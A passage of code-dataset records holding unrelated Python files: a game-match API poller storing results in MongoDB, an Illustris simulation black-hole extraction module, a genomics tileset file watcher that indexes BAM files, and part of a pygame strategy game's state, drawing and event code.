requests.get('https://na.api.pvp.net/api/lol/na/v4.1/game/ids/', params=args)\n#[1779697589]\n#increment by 300 to get next list\n#Idea: implement a FIFO queue, get a stack that gets a \n#No need to constantly get the matches. run a program that gets that gets matches and use mongodb.\n#Can be 1 document. 'matchesList':listOfMatches\n# Let's write that one.\n\n\n\nwhile(True):\n\tmatchRequest = requests.get('https://na.api.pvp.net/api/lol/na/v4.1/game/ids', params=args)\n\tmatchList = matchRequest.json()\n\tmatchDocument = {'beginDate': args['beginDate'], 'matchList': matchList}\n\tduplicate = matchDB.find({'beginDate':args['beginDate']})\n\tif (duplicate.count()== 0 and 'status' not in matchList):\n\t\tmatchDB.insert(matchDocument)\n\t\tprint (args['beginDate'] + ' was added')\n\telif('status' in matchList):\n\t\tif(matchList['status']['status_code'] == 429):\n\t\t\tprint('Rate limit exceeded. Waiting .5 and resending request for ' + args['beginDate'])\n\t\t\ttime.sleep(.5)\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint('The request had a status.')\n\t\t\tpdb.set_trace()\n\t\t\tcontinue\n\telse:\n\t\tprint (args['beginDate'] + ' skipped')\n\targs['beginDate'] = str(int(args['beginDate'])+300)","sub_path":"getMatches.py","file_name":"getMatches.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"25543773","text":"\"\"\"\nMAIN PURPOSE: locate all the black holes and match them to their subhalos\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport os\n\nimport tqdm\n\nfrom utils.generalfuncs import get\nfrom utils import SubProcess\n\nh = 0.704\nILL_BH_PART_TYPE = 5 # BH particles correspond to \"PartType5\"\n\n\nclass Find_BHs(SubProcess):\n \"\"\"\n This class locates all of the black holes through the simulation as each snapshot. To do this, it downloads all the bh particle information from the snapshot chunks. It also downloads group catalog files for header (offset) information. It uses the snapshot python function provided in the illustris python scripts to locate which subhalos have each black hole particle. It then reads out the data to a file. This process is done separately for each snapshot in case downloading times out.\n\n After this process is completed, all of the bh files for each snapshot are combined into an output file ``bhs_all_new.hdf5``.\n\n attributes:\n\n :param ill_run - (int) - which illustris run\n :param dir_output - (string) - base dir_output\n :param num_chunk_files_per_snapshot - (int) - number of chunk files per snapshot\n :param num_groupcat_files - (int) - number of group files needed at each snapshot for offset information\n :param first_snap_with_bhs - (int) - first snapshot where black holes exist\n :param skip_snaps - list of (int) - snaps missing in specific illustris run\n :param max_snap - (int) - highest snap in simulation\n\n base_url - (str) - base url for downloading files\n snaps - array of (int) - snapshot numbers of all subhalos with black holes in them\n subs - array of (int) - subhalo nubers of all subhalos with black holes in them\n needed - (boolean) - if this code needs to run\n bhs_dict - dict - all of the black hole particle information categories contained in simulation\n\n methods:\n\n reset_black_holes_dict\n download_bhs_all_snapshots\n download_bhs_for_snapshot\n download_snapshot_files\n download_groupcat_header_file\n populate_bh_dict\n read_out_to_file_snapshot\n delete_snapshot_files\n combine_black_hole_files\n delet_snap_bh_files\n \"\"\"\n\n def __init__(self, core, num_chunk_files_per_snapshot=512, num_groupcat_files=1):\n super().__init__(core)\n # self.dir_output = dir_output\n # self.dir_input = dir_input\n # self.ill_run = ill_run\n # self.base_url = \"http://www.illustris-project.org/api/Illustris-%i/\" % ill_run\n self.num_chunk_files_per_snapshot = num_chunk_files_per_snapshot\n self.num_groupcat_files = num_groupcat_files\n # self.first_snap_with_bhs = first_snap_with_bhs\n # self.max_snap = max_snap\n # self.skip_snaps = skip_snaps\n\n # load which subs have black holes\n # fname = os.path.join(self.dir_output, \"subs_with_bhs.hdf5\") # \"subs_with_bhs.hdf5\"\n fname = core.fname_subs_with_bhs()\n with h5py.File(fname, 'r') as f:\n self.snaps = f['Snapshot'][:]\n self.subs = f['SubhaloID'][:]\n\n # initialize the black hole dict\n self.reset_black_holes_dict()\n\n # check if this process is needed\n fname = self.core.fname_bhs_all()\n if os.path.exists(fname):\n self.needed = False\n print(\"\\t`Find_BHs` file already exists\")\n else:\n self.needed = True\n\n def reset_black_holes_dict(self):\n \"\"\"\n The black holes dict carries all information about the black holes, including the values for each quantity, the names all qunatities, the conversion factors to familiar units, and the datatype for readout.\n \"\"\"\n\n self.bhs_dict = {\n 'BH_CumEgyInjection_QM': {'unit': r'$M_odot/(ckpc^2\\ Gyr^2)$', 'dtype': 'f', 'cf': 1e10/(0.978**2*h), 'values': []},\n 'BH_CumMassGrowth_QM': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n 'BH_Density': {'unit': r'$M_\\odot/ckpc^3$', 'dtype': 'f', 'cf': 1e10*h**2, 'values': []},\n 'BH_Hsml': {'unit': 'ckpc', 'dtype': 'f', 'cf': 1/h, 'values': []},\n 'BH_Mass': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n 'BH_Mass_bubbles': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n 'BH_Mass_ini': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n 'BH_Mdot': {'unit': r'$M_\\odot$/year', 'dtype': 'f', 'cf': 10.22, 'values': []},\n 'BH_Pressure': {'unit': r'$M_odot/(ckpc\\ Gyr^2)$', 'dtype': 'f', 'cf': 1e10*h**3/(0.978**2), 'values': []},\n 'BH_Progs': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []},\n 'BH_U': {'unit': r'$(km/s)^2$', 'dtype': 'f', 'cf': 'None', 'values': []},\n 'Coordinates': {'unit': 'ckpc', 'dtype': 'f', 'cf': 1/h, 'values': []},\n 'HostHaloMass': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n 'Masses': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n 'NumTracers': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []},\n 'ParticleIDs': {'unit': 'None', 'dtype': 'long', 'cf': 'None', 'values': []},\n 'Potential': {'unit': r'$(km/s)^2/a$', 'dtype': 'f', 'cf': 'None', 'values': []},\n 'SubfindDensity': {'unit': r'$M_odot/ckpc^3$', 'dtype': 'f', 'cf': 1e10*h**2, 'values': []},\n 'SubfindHsml': {'unit': 'ckpc', 'dtype': 'f', 'cf': 1/h, 'values': []},\n 'SubfindVelDisp': {'unit': 'km/s', 'dtype': 'f', 'cf': 'None', 'values': []},\n 'Velocities': {'unit': r'$km\\sqrt(a)/s$', 'dtype': 'f', 'cf': 'None', 'values': []},\n 'Snapshot': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []},\n 'Subhalo': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []}\n }\n\n return\n\n def download_bhs_all_snapshots(self):\n \"\"\"\n This downloads all the black holes per snapshot.\n \"\"\"\n\n for snap in np.arange(self.first_snap_with_bhs, self.max_snap+1):\n if snap in self.skip_snaps:\n print('Skipped snapshot', snap)\n continue\n\n fname = self.core.fname_bhs_snapshot(snap)\n if os.path.exists(fname):\n continue\n\n self.download_bhs_for_snapshot(snap)\n self.reset_black_holes_dict()\n\n def download_bhs_for_snapshot(self, snap):\n \"\"\"\n This downloads black holes for a specific snapshot. First, the snapshot and group catalog chunk files are needed. To do this a specific file structure is needed. See http://www.illustris-project.org/data/docs/scripts/ for info.\n \"\"\"\n\n dir_name = self.dir_output + '%i/' % snap\n # if dir_name not in os.listdir(self.dir_output):\n # os.mkdir(dir_name)\n if not os.path.isdir(dir_name):\n if os.path.exists(dir_name):\n raise RuntimeError(\"Path '{}' exists but is not a directory!\".format(dir_name))\n os.mkdir(dir_name)\n\n print('Begin download snapshot file black hole info for snapshot', snap)\n self.download_snapshot_files(snap)\n print('\\tFinished downloading snapshot file black hole info for snapshot', snap)\n\n print('Begin download groupcat file for snapshot', snap)\n self.download_groupcat_header_file(snap)\n print('\\tFinished downloading groupcat file for snapshot', snap)\n\n self.populate_bh_dict(snap)\n self.read_out_to_file_snapshot(snap)\n\n self.delete_snapshot_files(snap)\n\n print('Finished gathering snapshot particle data for bhs for snapshot', snap)\n return\n\n def download_snapshot_files(self, snap):\n \"\"\"\n Download all of the chunk files for the current snapshot. Special file structure is needed. This only downloads the black hole information for memory conservation.\n \"\"\"\n\n if 'snapdir_%03d/' % snap not in os.listdir(self.dir_output + '%i/' % snap):\n os.mkdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap)\n\n for chunk_num in range(self.num_chunk_files_per_snapshot):\n if 'snap_%i.%i.hdf5' % (snap, chunk_num) in os.listdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap):\n continue\n cutout = get(self.base_url + \"files/snapshot-\" + str(snap) + '.' + str(chunk_num) + '.hdf5?bhs=all')\n os.rename(cutout, self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap + cutout)\n if chunk_num % 10 == 0:\n print('Snapshot chunk', chunk_num, 'out of', self.num_chunk_files_per_snapshot, 'completed.')\n return\n\n def download_groupcat_header_file(self, snap):\n \"\"\"\n Download the group catalog files which act as header files for `snapshot.py` (http://www.illustris-project.org/data/docs/scripts/ for info on this script.) Usually the first group catalog file is all that is needed for black hole particle informationself.\n \"\"\"\n\n if 'groups_%03d/' % snap not in os.listdir(self.dir_output + '%i/' % snap):\n os.mkdir(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap)\n\n for chunk_num in range(self.num_groupcat_files):\n if 'groups_%i.%i.hdf5' % (snap, chunk_num) in os.listdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap):\n continue\n cutout = get(self.base_url + \"files/groupcat-\" + str(snap) + '.' + str(chunk_num) + '.hdf5')\n os.rename(cutout, self.dir_output + '%i/' % snap + 'groups_%03d/' % snap + cutout)\n if chunk_num % 1 == 0:\n print('Groupcat chunk', chunk_num, 'out of', self.num_chunk_files_per_snapshot, 'completed.')\n\n return\n\n def populate_bh_dict(self, snap):\n \"\"\"\n Use `snapshot.py` to find all the black hole particles in each subhalo that has a black hole in it. You need the snapshot particle chunks and group catalog header information. This tells you the black holes in each subhalo which is important for pairing a black hole to its host galaxy. These values are populated in the bh_dict.\n \"\"\"\n import snapshot\n\n # figure out which subs are in this specific snapshot\n subs_to_look_in = self.subs[self.snaps == snap]\n for sub in subs_to_look_in:\n\n # load bh particle info from the snapshot folder using `snapshot.py`\n check_bhs_in_sub = snapshot.loadSubhalo(self.dir_output + '%i/' % snap, snap, sub, 5, fields=None)\n\n # need length to fill values for subhalo and snapshot\n length = len(check_bhs_in_sub['ParticleIDs'][:])\n self.bhs_dict['Subhalo']['values'].append(np.full((length, ), sub, dtype=int))\n self.bhs_dict['Snapshot']['values'].append(np.full((length, ), snap, dtype=int))\n\n for name in self.bhs_dict:\n if name == 'Subhalo' or name == 'Snapshot':\n continue\n self.bhs_dict[name]['values'].append(check_bhs_in_sub[name])\n\n return\n\n def read_out_to_file_snapshot(self, snap):\n \"\"\"\n Concatenate the information in each list of the bh dict and then read them out to a file specific to the bhs in this snapshot.\n \"\"\"\n fname = self.core.fname_bhs_snapshot(snap)\n with h5py.File(fname, 'w') as f:\n for name in self.bhs_dict:\n output = np.concatenate(self.bhs_dict[name]['values'], axis=0)\n\n # multiply by a conversion factor if there is one\n if self.bhs_dict[name]['cf'] != 'None':\n output = output * self.bhs_dict[name]['cf']\n\n dset = f.create_dataset(name, data=output, dtype=output.dtype.name, chunks=True, compression='gzip', compression_opts=9)\n\n dset.attrs['unit'] = self.bhs_dict[name]['unit']\n\n return\n\n def delete_snapshot_files(self, snap):\n \"\"\"\n Delete the snapshot chunks and group catalog chunks (header files). First check to make sure the output file is there.\n \"\"\"\n\n # make sure black hole file is there!!!\n fname = self.core.fname_bhs_snapshot(snap)\n if not os.path.exists(fname):\n raise Exception('About to delete files when completed file (%s) is not there.' % fname)\n\n for f in os.listdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap):\n os.remove(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap + f)\n\n for f in os.listdir(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap):\n os.remove(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap + f)\n\n return\n\n def combine_black_hole_files(self):\n \"\"\"\n Combine all the ``(snap)_blackholes.hdf5`` into a single file: ``bhs_all_new.hdf5``.\n \"\"\"\n\n # reset the dict so it is ready to populate\n self.reset_black_holes_dict()\n bhs_dict = self.bhs_dict\n print([name for name in bhs_dict])\n\n # open snapshot specific files and populate dict\n for snap in tqdm.trange(self.first_snap_with_bhs, self.max_snap+1, desc='Loading BHs'):\n if snap in self.skip_snaps:\n continue\n fname = self.core.fname_bhs_snapshot(snap)\n with h5py.File(fname, 'r') as f:\n for name in bhs_dict:\n self.bhs_dict[name]['values'].append(f[name][:])\n\n # concatenate each list\n for name in self.bhs_dict:\n output = np.concatenate(self.bhs_dict[name]['values'], axis=0)\n # to be certain the items are ordered properly, place in a structured array\n # and sort by snapshot and then subhalo.\n num_snaps = len(bhs_dict['Subhalo']['values'])\n dtype = [('Snapshot', np.dtype(np.uint64)), ('Subhalo', np.dtype(np.uint64))]\n # checker = np.array([(bhs_dict['Snapshot']['values'][i], bhs_dict['Subhalo']['values'][i])\n # for i in range(num_snaps)], dtype=dtype)\n # sort = np.argsort(checker, order=('Snapshot', 'Subhalo'))\n\n snaps = []\n subs = []\n sort = {key: [] for key in bhs_dict}\n for ii in tqdm.trange(num_snaps, desc='BHs'):\n aa = bhs_dict['Snapshot']['values'][ii]\n bb = bhs_dict['Subhalo']['values'][ii]\n\n snaps = np.concatenate((snaps, aa))\n subs = np.concatenate((subs, bb))\n\n checker = np.core.records.fromarrays([snaps, subs], dtype=dtype)\n sort = np.argsort(checker, order=('Snapshot', 'Subhalo'))\n\n print('Write out to combined file.')\n fname = self.core.fname_bhs_all()\n with h5py.File(fname, 'w') as f:\n for name in bhs_dict:\n vals = np.concatenate(bhs_dict[name]['values'])\n # print(name, np.shape(vals), np.shape(sort))\n output = vals[sort]\n # print(\"\\t\", np.shape(output))\n dset = f.create_dataset(name, data=output, dtype=output.dtype.name,\n chunks=True, compression='gzip', compression_opts=9)\n dset.attrs['unit'] = bhs_dict[name]['unit']\n\n # self.delete_snap_bh_files()\n return\n\n def delet_snap_bh_files(self):\n \"\"\"\n Delete the snapshot specific bh files to conserve memory.\n \"\"\"\n\n for snap in np.arange(self.first_snap_with_bhs, self.max_snap+1):\n fname = self.core.fname_bhs_snapshot(snap)\n os.remove(fname)\n\n return\n\n\nclass Find_BHs_Odyssey(Find_BHs):\n\n def __init__(self, *args, **kwargs):\n from illpy_lib.subhalos import particle_hosts\n super().__init__(*args, **kwargs)\n\n print(\"Loading BH hosts data for all snapshots\")\n # self.bh_hosts = particle_hosts.load_bh_hosts(self.ill_run)\n self.bh_hosts = particle_hosts._load_bh_hosts_table(self.ill_run)\n print(\"\\thosts loaded\")\n return\n\n def download_snapshot_files(self, snap):\n print(\"\\t`download_snapshot_files` is not required on Odyssey\")\n return\n\n def download_groupcat_header_file(self, snap):\n print(\"\\t`download_groupcat_header_file` is not required on Odyssey\")\n return\n\n def populate_bh_dict(self, snap):\n import illpy\n # from illpy_lib.subhalos import particle_hosts\n\n # Load host subhalo information for all BHs in this snapshot\n # print(\"Loading BH hosts data for snapshot '{}'\".format(snap))\n # bh_hosts = particle_hosts.load_bh_hosts_snap(self.ill_run, snap)\n bh_hosts = self.bh_hosts['{:03d}'.format(snap)]\n\n # Only look at BH that have a subhhalo (those without have value '-1')\n # NOTE: some of the files seem to have binary keys... look out for that\n try:\n key = 'bh_subhalos'\n goods = (bh_hosts[key] >= 0)\n except KeyError:\n print(\"keys = \", bh_hosts.keys())\n try:\n key = b'bh_subhalos'\n goods = (bh_hosts[key] >= 0)\n except KeyError:\n raise\n\n length = np.count_nonzero(goods)\n bh_subhalos = bh_hosts[key][goods]\n # bh_ids = bh_hosts['bh_ids'][goods]\n print(\"\\t{:.4e}/{:.4e} = {:.4f} good BHs\".format(length, goods.size, length/goods.size))\n del bh_hosts\n\n # Load all BHs in this snapshot\n keys = list(self.bhs_dict.keys())\n keys.pop(keys.index('Snapshot'))\n keys.pop(keys.index('Subhalo'))\n print(\"\\tLoading all BH from snapshot '{}'\".format(snap))\n snap_bhs = illpy.snapshot.loadSubset(self.dir_input, snap, ILL_BH_PART_TYPE, fields=keys)\n print(\"\\t\\tLoaded {} BH\".format(snap_bhs['count']))\n\n self.bhs_dict['Subhalo']['values'].append(bh_subhalos)\n self.bhs_dict['Snapshot']['values'].append(np.full((length, ), snap, dtype=int))\n\n for name in self.bhs_dict:\n if name in ['Subhalo', 'Snapshot']:\n continue\n self.bhs_dict[name]['values'].append(snap_bhs[name][goods])\n\n return\n\n def delete_snapshot_files(self, snap):\n print(\"\\t`delete_snapshot_files` is not required on Odyssey\")\n return\n","sub_path":"extraction/utils/find_bhs.py","file_name":"find_bhs.py","file_ext":"py","file_size_in_byte":18354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"249127240","text":"import os\nimport subprocess\nfrom pathlib import Path\n\nimport slugid\nfrom watchgod.watcher import DefaultWatcher\n\nfrom .utils import TileSet, TileSetDB, FileMonitor\n\n\nclass TilesetsMonitor(FileMonitor):\n def __init__(self, tilsets_db, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.tilesets = tilsets_db\n\n async def run(self, store_uri=None):\n await self.tilesets.connect(store_uri=store_uri)\n await super().run()\n\n async def check_event(self, event):\n print(event.type, event.path)\n path = str(event.path.resolve())\n\n # Do nothing when the same file added(or restarted the program)\n if event.type == self.added:\n for uuid, tileset in await self.tilesets.items(datafile=path):\n path_equal = tileset['datafile'] == path\n if path_equal and TileSet.hash(path) == tileset['_hash']:\n return False\n\n # delete all recorded file with the same datafile prefix(except this modified file)\n # delete all recorded tilesets with the same datafile prefix\n elif event.type == self.modified:\n uuids = []\n for uuid, tileset in await self.tilesets.items(name=event.path.stem):\n if tileset['datafile'] != str(event.path):\n os.remove(tileset.datafile)\n uuids.append(uuid)\n await self.tilesets.remove(uuids)\n\n # delete all recorded tilesets with the same datafile path.\n elif event.type == self.deleted:\n uuids = []\n for uuid, tileset in await self.tilesets.items(datafile=path):\n uuids.append(uuid)\n await self.tilesets.remove(uuids)\n return False\n\n return True\n\n\nclass FileWatcher(DefaultWatcher):\n def should_watch_dir(self, entry):\n return False\n\n\nwatch = default_monitor = TilesetsMonitor(\n tilsets_db=TileSetDB(),\n watcher_cls=FileWatcher\n)\n\n\n@watch(r'.*\\.mcool$')\nasync def cooler(watcher, event):\n uuid = slugid.nice()\n await watcher.tilesets.update({\n uuid: TileSet(\n uuid=uuid,\n datafile=str(event.path),\n datatype=\"matrix\",\n filetype=\"cooler\",\n ).todict()\n })\n\n\n@watch(r\".*\\.(bigwig|bw)$\")\nasync def bigwig(watcher, event):\n uuid = slugid.nice()\n await watcher.tilesets.update({\n slugid.nice(): TileSet(\n uuid=uuid,\n datafile=str(event.path),\n datatype=\"vector\",\n filetype=\"bigwig\"\n ).todict()\n })\n\n\n@watch(r\".*\\.(sam|bam)$\")\ndef bam(event):\n bam_index_path = Path(str(event.path) + \".bai\")\n if not bam_index_path.exists():\n subprocess.call([\"samtools\", \"index\", str(event.path)])\n return bam_index_path\n\n\n@bam.done\nasync def bam_register(watcher, event, bam_index_path):\n if bam_index_path.exists():\n uuid = slugid.nice()\n await watcher.tilesets.update({\n uuid: TileSet(\n uuid=uuid,\n datafile=str(event.path),\n datatype=\"reads\",\n filetype=\"bam\",\n indexfile=str(bam_index_path)\n ).todict()\n })\n\n\n@watch(r'.*\\.bed$')\ndef bed():\n pass\n\n\n@watch(r\".*\\.bedpe$\")\ndef bedpe():\n pass\n\n\n@watch(r\".*\\.(chrom\\.sizes|chromsizes|chromsize)$\")\nasync def chromsizes(watcher, event):\n pass\n","sub_path":"hictools/hgserver/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"381516444","text":"import pygame\nimport tiles\nimport textures\nimport random\nimport buildings\nimport os\n\nclass GameStateManager(object):\n\n def __init__(self, state, system, body, world, cloud):\n self.state = state\n self.system = system\n self.body = body\n self.world = world\n self.cloud = cloud\n self.done = False\n\n def set_state(self, state):\n self.state = state\n\n def add_state(self, val):\n self.state += val\n\n def get_state(self):\n return self.state\n\n def set_system(self, system):\n self.system = system\n\n def get_system(self):\n return self.system\n\n def set_body(self, body):\n self.body = body\n\n def get_body(self):\n return self.body\n\n def set_world(self, world):\n self.world = world\n\n def get_world(self):\n return self.world\n\n def get_cloud(self):\n return self.cloud\n\n def get_done(self):\n return self.done\n\n def set_done(self, value):\n self.done = value\n\n########## States\n# 0 - menu\n# 1 - universe map\n# 2 - system map\n# 3 - planet / star screen\n# 4 - cloud (isometric?)\n####\n\nclass Drawer(object):\n\n def __init__(self, state_manager, data_manager, ui_manager, galaxy, screen):\n self.s_man = state_manager\n self.d_man = data_manager\n self.galaxy = galaxy\n self.screen = screen\n self.ui_man = ui_manager\n self.screen_w = screen.get_width()\n self.screen_h = screen.get_height()\n self.camera_x = self.screen_w/2\n self.camera_y = self.screen_h/2\n self.camera_zoom = 2\n\n self.dir = os.path.dirname(__file__)\n\n self.tile_surface = pygame.Surface((64,64))\n self.current_map = []\n self.tile_images = []\n\n pygame.font.init()\n #self.font = pygame.font.SysFont('oratorstdopentype', 24)\n self.font = pygame.font.SysFont('arial', 24)\n limiting_dimension = self.screen.get_height()\n if self.screen.get_width() < self.screen.get_height():\n limiting_dimension = self.screen.get_width()\n self.body_view_size = int(limiting_dimension*0.7)\n\n self.img_test_red = pygame.transform.scale(pygame.image.load(os.path.join(self.dir,'res','test_red.png')),\n (int(self.body_view_size/4), int(self.body_view_size/4)))\n #\n\n self.init_tile_array()\n self.update_tiles()\n\n def init_tile_array(self):\n self.current_map = []\n tmap = self.s_man.get_world().get_tile_map()\n for i in range(len(tmap.map)):\n row = []\n row2 = []\n for j in range(len(tmap.map[i])):\n row.append(None)\n row2.append(None)\n self.current_map.append(row)\n self.tile_images.append(row2)\n self.surface = pygame.Surface((len(tmap.map)*tmap.get_tile_h(), len(tmap.map[0])*tmap.get_tile_w()))\n\n def move_camera(self, move):\n self.camera_x += move[0]\n self.camera_y += move[1]\n\n def zoom_camera(self, zoom):\n if self.camera_zoom + zoom < 0.2:\n self.camera_zoom = 0.2\n else:\n self.camera_zoom += zoom\n\n def zoom_mult(self, value):\n self.camera_zoom *= value\n\n def update_tiles(self):\n tmap = self.s_man.get_world().get_tile_map()\n tw = tmap.get_tile_w()\n th = tmap.get_tile_h()\n\n images = []\n\n for i in range(len(tiles.images)):\n images.append(tiles.images[i])\n\n for i in range(len(tmap.map)):\n for j in range(len(tmap.map[i])):\n if tmap.map[i][j] != self.current_map[i][j]:\n self.current_map[i][j] = tmap.map[i][j]\n x = i * tw\n y = j * th\n self.tile_images[i][j] = images[tmap.map[i][j]]\n image_rect = self.tile_images[i][j].get_rect(topleft = (x, y))\n self.surface.blit(self.tile_images[i][j], image_rect)\n print(\"updated\")\n print(\"done\")\n\n def draw(self):\n if self.s_man.get_state() == 3:\n body = self.s_man.get_body()\n if body.get_type() == 'star':\n image = body.get_image()\n the_cloud = self.s_man.get_cloud()\n sphereimg = textures.img[0]\n\n image = pygame.transform.scale(image, (self.body_view_size, self.body_view_size))\n sphereimg = pygame.transform.scale(sphereimg, (int(self.body_view_size*1.3), int(self.body_view_size*1.3)))\n image_rect = image.get_rect(center=(self.screen_w/2, self.screen_h/2))\n sphere_rect = sphereimg.get_rect(center=(self.screen_w/2, self.screen_h/2))\n\n self.screen.blit(image, image_rect)\n self.screen.blit(sphereimg, sphere_rect)\n\n if body.get_energy_level() == 1:\n upgrade_img = pygame.transform.scale(body.upgrade_img, (int(self.body_view_size*0.3),int(self.body_view_size*0.3)))\n upgrade_rect = upgrade_img.get_rect(center=(self.screen_w/2, self.screen_h/2))\n self.screen.blit(upgrade_img, upgrade_rect)\n\n elif body.get_type() == 'planet':\n image = body.get_image()\n the_cloud = self.s_man.get_cloud()\n\n limiting_dimension = self.screen.get_height()\n if self.screen.get_width() < self.screen.get_height():\n limiting_dimension = self.screen.get_width()\n\n build_select = body.check_mouse((pygame.mouse.get_pos()[0]-self.screen_w/2,\n pygame.mouse.get_pos()[1]-self.screen_h/2), self.body_view_size/2)\n\n image = pygame.transform.scale(image, (int(limiting_dimension*0.7), int(limiting_dimension*0.7)))\n image_rect = image.get_rect(center=(self.screen.get_width()/2, self.screen.get_height()/2))\n\n self.screen.blit(image, image_rect)\n\n for i in range(8):\n if body.buildings[i] == 1:\n build_rect = self.img_test_red.get_rect(center=(body.building_coords[i][0]*self.body_view_size/2+self.screen_w/2,\n body.building_coords[i][1]*self.body_view_size/2+self.screen_h/2))\n self.screen.blit(self.img_test_red, build_rect)\n\n if build_select[0] != None:\n sel_rect = self.img_test_red.get_rect(center=(build_select[0]+self.screen_w/2,build_select[1]+self.screen_h/2))\n self.screen.blit(self.img_test_red, sel_rect)\n\n elif self.s_man.get_state() == 4:\n\n# tmap = self.s_man.get_world().get_tile_map()\n# tw = tmap.get_tile_w()\n# th = tmap.get_tile_h()\n#\n# images = []\n#\n# for i in range(len(tiles.images)):\n# images.append(pygame.transform.scale(tiles.images[i], (int(tw*self.camera_zoom), int(th*self.camera_zoom))))\n#\n# for i in range(len(tmap.map)):\n# for j in range(len(tmap.map[i])):\n# x = self.camera_x - self.screen_w/2 + i * tw * self.camera_zoom\n# y = self.camera_y - self.screen_h/2 + j * th * self.camera_zoom\n# image = pygame.transform.scale(images[tmap.map[i][j]], (int(tw*self.camera_zoom), int(th*self.camera_zoom)))\n# image_rect = image.get_rect(topleft = (x, y))\n# self.screen.blit(image, image_rect)\n#\n x = self.camera_x - self.screen_w/2\n y = self.camera_y - self.screen_h/2\n surf = pygame.transform.scale(self.surface, (int(self.camera_zoom*self.surface.get_width()), int(self.camera_zoom*self.surface.get_height())))\n self.screen.blit(surf, (x, y))\n\n elif self.s_man.get_state() == 5:\n\n start_x = 0\n start_y = self.screen.get_height()/2\n start_pos = (start_x, start_y)\n\n tmap = self.s_man.get_world().get_tile_map()\n tw = tmap.get_tile_w()\n th = tmap.get_tile_h()\n\n for i in range(len(tmap.map)):\n for j in reversed(range(len(tmap.map[i]))):\n x = start_x + (tw/2)*(i+j)\n y = start_y + (th/2)*(j-i)\n image = tiles.images[tmap.map[i][j]]\n image_rect = image.get_rect(bottomleft=(x,y+th/2))\n self.screen.blit(image, image_rect)\n\n elif self.s_man.get_state() == 2:\n\n bodies = self.s_man.get_system().bodies\n num_bodies = len(bodies)\n\n screen_w = self.screen.get_width()\n screen_h = self.screen.get_height()\n\n total_w = 0\n current_w = 0\n\n for i in bodies:\n total_w += i.get_image().get_width()\n\n for i in range(num_bodies):\n image = bodies[i].get_image()\n w = image.get_width()\n h = image.get_height()\n x = 0.9*screen_w - 0.8*i*((screen_w-total_w)/num_bodies) - current_w\n y = screen_h/2\n rect = image.get_rect(midright=(x,y))\n self.screen.blit(image, rect)\n current_w += w\n\n mouse_x = pygame.mouse.get_pos()[0]\n mouse_y = pygame.mouse.get_pos()[1]\n\n if mouse_x<=x and mouse_x>=x-w:\n if mouse_y>=y-h/2 and mouse_y<=y+h/2:\n self.ui_man.draw_text_box(bodies[i].get_name(), True, (10,10,10), (180,180,180), x+w/10, y-h/2)\n if pygame.mouse.get_pressed()[0]:\n self.s_man.set_body(bodies[i])\n self.s_man.set_state(3)\n\n self.ui_man.draw()\n\nclass RandomEventManager(object):\n\n def __init__(self, state_manager, data_manager):\n self.s_man = state_manager\n self.d_man = data_manager\n\n def update(self):\n if random.randint(1,60) == 1: # make people randomly move into cloud\n self.d_man.add_value('money', self.d_man.price)\n self.d_man.add_value('storage', 10)\n self.s_man.get_cloud().add_population(10)\n random.choice(self.s_man.system.planets).add_population(-10)\n self.s_man.system.update_population()\n\nclass EventHandler(object):\n\n def __init__(self, state_manager, data_manager, ui_manager, build_manager, drawer, galaxy, screen):\n self.s_man = state_manager\n self.d_man = data_manager\n self.b_man = build_manager\n self.galaxy = galaxy\n self.screen = screen\n self.screen_w = screen.get_width()\n self.screen_h = screen.get_height()\n self.ui_man = ui_manager\n self.drawer = drawer\n self.world = self.s_man.get_world()\n self.last_mouse_x = 0\n self.last_mouse_y = 0\n\n def update(self):\n # if pygame.mouse.get_pressed()[0]:\n # self.ui_man.check_button_pressed(pygame.mouse.get_pos())\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.ui_man.check_button_pressed(pygame.mouse.get_pos()) # check buttons\n if self.s_man.get_state() == 3 and self.s_man.get_body().get_type() == 'planet':\n build_index = self.s_man.get_body().check_mouse((pygame.mouse.get_pos()[0]-self.drawer.screen_w/2,\n pygame.mouse.get_pos()[1]-self.drawer.screen_h/2), self.drawer.body_view_size/2)[2]\n if build_index != None: # build\n self.s_man.get_body().buildings[build_index] = 1\n self.b_man.add('mines', buildings.Mine())\n if self.s_man.get_state() == 4: # build tiles\n index = self.s_man.get_world().get_tile_map().get_index(\n pygame.mouse.get_pos(), (self.drawer.camera_x, self.drawer.camera_y),\n self.drawer.camera_zoom, (self.screen_w, self.screen_h))\n self.b_man.build_tile(self.world, index, 1)\n self.drawer.update_tiles()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 4:\n self.drawer.zoom_mult(2)\n elif event.button == 5:\n self.drawer.zoom_mult(0.5)\n if event.type == pygame.QUIT:\n self.s_man.set_done(True)\n if event.type == pygame.KEYDOWN:\n if event.key == 